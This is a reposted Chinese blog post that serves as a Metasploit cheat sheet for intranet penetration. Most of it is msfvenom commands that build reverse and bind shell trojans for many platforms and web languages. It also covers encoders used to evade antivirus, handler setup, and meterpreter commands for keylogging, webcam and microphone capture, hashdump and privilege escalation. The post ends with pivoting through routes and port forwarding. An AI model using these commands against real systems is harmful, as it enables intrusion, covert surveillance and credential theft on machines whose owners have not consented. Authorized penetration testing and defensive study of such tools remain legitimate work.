轉自：https://thief.one/2017/08/01/1/?hmsr=toutiao.io&utm_medium=toutiao.io&utm_source=toutiao.io

今天玩了一把內網滲透，其中主要用到了 metasploit 這款內網滲透神器。metasploit大家肯定不陌生，我也在很早之前就有接觸過，但每次重新使用它時都會遺忘一些用法，因此為了方便查詢我在本篇記錄下metasploit神器的一些常用命令，以及內網滲透中如何使用它。
Mac下安裝metasploit
mac下安裝metasploit比較簡單，官網下載pkg安裝包，直接安裝即可；需要注意的是安裝完成后的路徑。msfconsole路徑：
1

/opt/metasploit-framework/bin

該目錄下還有其他幾個常用的工具：

/opt/metasploit-framework/embedded/framework/modules/exploits

msfvenom
作用：生成木馬文件，替代早期版本的msfpayload和msfencoder。
Options
msfvenom命令行選項如下：
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19

-p, --payload <payload> 指定需要使用的payload(攻擊荷載)
-l, --list [module_type] 列出指定模塊的所有可用資源,模塊類型包括: payloads, encoders, nops, all
-n, --nopsled <length> 為payload預先指定一個NOP滑動長度
-f, --format <format> 指定輸出格式 (使用 --help-formats 來獲取msf支持的輸出格式列表)
-e, --encoder [encoder] 指定需要使用的encoder（編碼器）
-a, --arch <architecture> 指定payload的目標架構
--platform <platform> 指定payload的目標平臺
-s, --space <length> 設定有效攻擊荷載的最大長度
-b, --bad-chars <list> 設定規避字符集，比如: '\x00\xff'
-i, --iterations <count> 指定payload的編碼次數
-c, --add-code <path> 指定一個附加的win32 shellcode文件
-x, --template <path> 指定一個自定義的可執行文件作為模板
-k, --keep 保護模板程序的動作，注入的payload作為一個新的進程運行
--payload-options 列舉payload的標準選項
-o, --out <path> 保存payload
-v, --var-name <name> 指定一個自定義的變量，以確定輸出格式
--shellest 最小化生成payload
-h, --help 查看幫助選項
--help-formats 查看msf支持的輸出格式列表

options usage
查看支持的payload列表：
1

msfvenom -l payloads

查看支持的輸出文件類型：
1

msfvenom --help-formats

查看支持的編碼方式：(為了達到免殺的效果)
1

msfvenom -l encoders

查看支持的空字段模塊：(為了達到免殺的效果)
1

msfvenom -l nops

基礎payload
命令格式
1

msfvenom -p <payload> <payload options> -f <format> -o <path>

Linux
1
2
3
4

反向連接：
msfvenom -p linux/x86/meterpreter/reverse_tcp LHOST=<Your IP Address> LPORT=<Your Port to Connect On> -f elf > shell.elf
正向連接：
msfvenom -p linux/x86/meterpreter/bind_tcp LHOST=<Target IP Address> LPORT=<Your Port to Connect On> -f elf > shell.elf

Windows
1

msfvenom -p windows/meterpreter/reverse_tcp LHOST=<Your IP Address> LPORT=<Your Port to Connect On> -f exe > shell.exe

Mac
1
2

msfvenom -p osx/x86/shell_reverse_tcp LHOST=<Your IP Address> LPORT=<Your Port to Connect On> -f macho > shell.macho
Web Payloads

PHP
1
2

msfvenom -p php/meterpreter_reverse_tcp LHOST=<Your IP Address> LPORT=<Your Port to Connect On> -f raw > shell.php
cat shell.php | pbcopy && echo '<?php ' | tr -d '\n' > shell.php && pbpaste >> shell.php

ASP
1

msfvenom -p windows/meterpreter/reverse_tcp LHOST=<Your IP Address> LPORT=<Your Port to Connect On> -f asp > shell.asp

JSP
1

msfvenom -p java/jsp_shell_reverse_tcp LHOST=<Your IP Address> LPORT=<Your Port to Connect On> -f raw > shell.jsp

WAR
1
2

msfvenom -p java/jsp_shell_reverse_tcp LHOST=<Your IP Address> LPORT=<Your Port to Connect On> -f war > shell.wa
Scripting Payloads

Python
1

msfvenom -p cmd/unix/reverse_python LHOST=<Your IP Address> LPORT=<Your Port to Connect On> -f raw > shell.py

Bash
1

msfvenom -p cmd/unix/reverse_bash LHOST=<Your IP Address> LPORT=<Your Port to Connect On> -f raw > shell.sh

Perl
1

msfvenom -p cmd/unix/reverse_perl LHOST=<Your IP Address> LPORT=<Your Port to Connect On> -f raw > shell.pl

Linux Based Shellcode
1

msfvenom -p linux/x86/meterpreter/reverse_tcp LHOST=<Your IP Address> LPORT=<Your Port to Connect On> -f <language>

Windows Based Shellcode
1

msfvenom -p windows/meterpreter/reverse_tcp LHOST=<Your IP Address> LPORT=<Your Port to Connect On> -f <language>

Mac Based Shellcode
1
2

msfvenom -p osx/x86/shell_reverse_tcp LHOST=<Your IP Address> LPORT=<Your Port to Connect On> -f <language>
Handlers

payload加編碼
命令格式：
1

msfvenom -p <payload> <payload options> -a <arch> --platform <platform> -e <encoder option> -i <encoder times> -b <bad-chars> -n <nopsled> -f <format> -o <path>

常用編碼：
1
2

x86/shikata_ga_nai
cmd/powershell_base64

例子：
1

msfvenom -p windows/meterpreter/bind_tcp -e x86/shikata_ga_nai -i 3 -f exe > 1.exe

自選模塊
生成執行計算器payload例子：
1

msfvenom -p windows/meterpreter/bind_tcp -x calc.exe -f exe > 1.exe

payload的坑
正常情況下，利用msfvenom生成的木馬文件，可直接上傳到目標服務器上運行（加權限）。但我自己遇到過一個坑，生成的文件內容有部分是無用的，會引起報錯，如下圖所示。

search尋找模塊
比如尋找ms15_034漏洞的利用插件
1

search ms15_034

linux/x86/meterpreter/reverse_tcp
linux/x86/meterpreter/bind_tcp
linux/x86/shell_bind_tcp
linux/x86/shell_reverse_tcp
linux/x64/shell_reverse_tcp
linux/x64/shell_bind_tcp

windows相關payload:
1
2
3
4
5
6
7
8

windows/meterpreter/reverse_tcp
windows/meterpreter/bind_tcp
windows/shell_reverse_tcp
windows/shell_bind_tcp
windows/x64/meterpreter/reverse_tcp
windows/x64/meterpreter/bind_tcp
windows/x64/shell_reverse_tcp
windows/x64/shell_bind_tcp

注意：含有x64只適用目標服務器為64位操作系統的，沒有x64或者使用x86的只適用32位操作系統；含有meterpreter的模塊會反彈meterpreter_shell，而普通的shell模塊只會反彈普通的shell（反彈結果跟nc類似）；reverse_tcp表示木馬會主動連接目標服務器，bind_tcp表示木馬會監聽本地的端口，等待攻擊者連接。因此生成的木馬文件，要根據具體情況而定。
payload選擇
前面介紹了常用的payload，那么payload選擇的三大要素如下：
木馬連接的方向
目標操作系統及版本
反彈的shell類型

木馬連接方向：msf木馬分為正向連接與反向連接，正向連接適合攻擊機能給連接目標機的情況，反向連接使用目標機能連接攻擊機的情況，這里所說的連接一般是指tcp的某個端口。因此在生成木馬前，需要先判斷當前環境，適合正向連接木馬還是反向連接的木馬。（可以使用nc工具測試，詳細參考：【滲透神器系列】nc）
目標操作系統類型查看：這個不說了！操作系統位數查看：
1

getconf LONG_BIT

反彈shell類型：這個主要取決于反彈的shell的用途，一般執行系統命令的話普通操作系統的shell就夠了。如果想要使用高級功能，比如：鍵盤記錄，開啟攝像頭，添加路由等功能，可以使用meterpreter_shell。
連接木馬
開啟msf，啟用exploit/multi/handler模塊。
1
2
3
4
5
6

use exploit/multi/handler
set payload linux/x86/meterpreter/bind_tcp
show options
set RHOST 10.0.0.1
set LPORT 12345
exploit

backgroud 將msf進程放到后臺
session -i 1 將進程拖回前臺運行
run vnc 遠程桌面的開啟

文件管理功能：
1
2
3
4
5
6
7
8

Download 下載文件
Edit 編輯
cat 查看
mkdir 創建
mv 移動
rm 刪除
upload 上傳
rmdir 刪除文件夾

網絡及系統操作：
1
2
3
4
5
6
7
8
9
10
11

Arp 看ARP緩沖表
Ifconfig IP地址網卡
Getproxy 獲取代理
Netstat 查看端口鏈接
Kill 結束進程
Ps 查看進程
Reboot 重啟電腦
Reg 修改注冊表
Shell 獲取shell
Shutdown 關閉電腦
sysinfo 獲取電腦信息

用戶操作和其他功能講解:
1
2
3
4
5
6
7
8
9
10
11

enumdesktops 用戶登錄數
keyscan_dump　　 鍵盤記錄－下載
keyscan_start　　鍵盤記錄?。￠_始
keyscan_stop 　　鍵盤記錄?。⊥Ｖ?br> Uictl　　　　　　獲取鍵盤鼠標控制權
record_mic　　　 音頻錄制
webcam_chat　　　查看攝像頭接口
webcam_list　　　查看攝像頭列表
webcam_stream　　攝像頭視頻獲取
Getsystem　　　　獲取高權限
Hashdump　　　 下載ＨＡＳＨ

meterpreter添加路由
大多時候我們獲取到的meterpreter shell處于內網，而我們需要代理到目標內網環境中，掃描其內網服務器。這時可以使用route功能，添加一條通向目標服務器內網的路由。
查看shell網絡環境：
1

meterpreter>run get_local_subnets

添加一條通向目標服務器內網的路由
1

meterpreter>run autoroute -s 100.0.0.0/8 (根據目標內網網絡而定)

查看路由設置：
1

meterpreter>run autoroute –p

一般來說，在meterpreter中設置路由便可以達到通往其內網的目的。然而有些時候還是會失敗，這時我們可以background返回msf>，查看下外面的路由情況。
1

route print

如果發現沒有路由信息，說明meterpreter shell設置的路由并沒有生效，我們可以在msf中添加路由。
1

msf>route add 10.0.0.0 255.0.0.0 1

說明：1表示session 1，攻擊機如果要去訪問10.0.0.0/8網段的資源，其下一跳是session1，至于什么是下一條這里不多說了，反正就是目前攻擊機可以訪問內網資源了。
meterpreter端口轉發
假設目前我們掃描到了10網段的某個ip存在mysql弱口令，賬號密碼都有了，那么我們可以在肉雞服務器上登陸目標服務器mysql。當然，如果我想在攻擊機上去登陸mysql，可以使用端口轉發。（某些情況下，內網的機器也不能互相ssh，需要登陸堡壘機）
在meterpreter shell中輸入：
1

meterpreter > portfwd add -l 55555 -r 10.0.0.1 -p 3306

表示將10.0.0.1服務器上的3306端口轉發到本地的55555端口，然后我們可以在本地運行mysql –h 127.0.0.1 –u root –P 55555 –p 去登陸mysql。其他端口如ssh、ftp等都類似，這個過程跟msf代理很像。
網絡上關于metasploit用法的資料很多，這里主要記錄一些常用用法，以及個人使用過程中的一些坑
參考文章：http://www.freebuf.com/sectool/72135.htmlhttp://blog.csdn.net/lzhd24/article/details/50664342http://blog.csdn.net/qq_34457594/article/details/52756458http://www.freebuf.com/sectool/56432.htmlhttp://www.freebuf.com/articles/network/125278.html
傳送門
【滲透神器系列】DNS信息查詢【滲透神器系列】nc【滲透神器系列】nmap【滲透神器系列】Fiddler【滲透神器系列】搜索引擎【滲透神器系列】WireShark